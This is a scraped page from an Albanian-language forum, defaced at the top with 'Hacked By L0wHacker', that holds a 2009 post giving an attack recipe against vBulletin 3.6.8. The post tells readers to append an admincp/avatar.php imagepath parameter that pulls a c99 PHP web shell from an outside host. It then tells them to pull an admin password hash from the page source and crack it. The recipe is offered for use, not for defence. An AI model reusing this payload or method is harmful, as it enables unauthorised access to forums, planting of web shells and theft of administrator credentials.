Hacked By L0wHacker

Hacked By L0wHacker
Hacked By L0wHacker

Hacked by L0wHacker


  Vbulletin 3.6.8 Xxs

  Share

  Vbulletin 3.6.8 Xxs

  Mesazh nga σт¢нєє™ prej Fri May 15, 2009 7:27 am

  Qe nje xxs per vbulletin 3.6.8

  Fillim shikojm ndonje forum 3.6.8 www.emri.com/forum ja shtojm kete mbas:

  admincp/avatar.php?imagepath=http://no.spam.ee/~tonu/phpshell/c99shell.txt?

  Pastaj nqs se ka te siguruar te qon ne hyrje te admincp shkojm aty me majten View Source , shtypim Ctrl+f kerkojm per

  type

  aty afer e keni hashin e njerit prej adminave atehere kerkojm ndonje Hash cracker te mire dhe funksionon met mira

   Ora është Thu Apr 19, 2018 11:41 am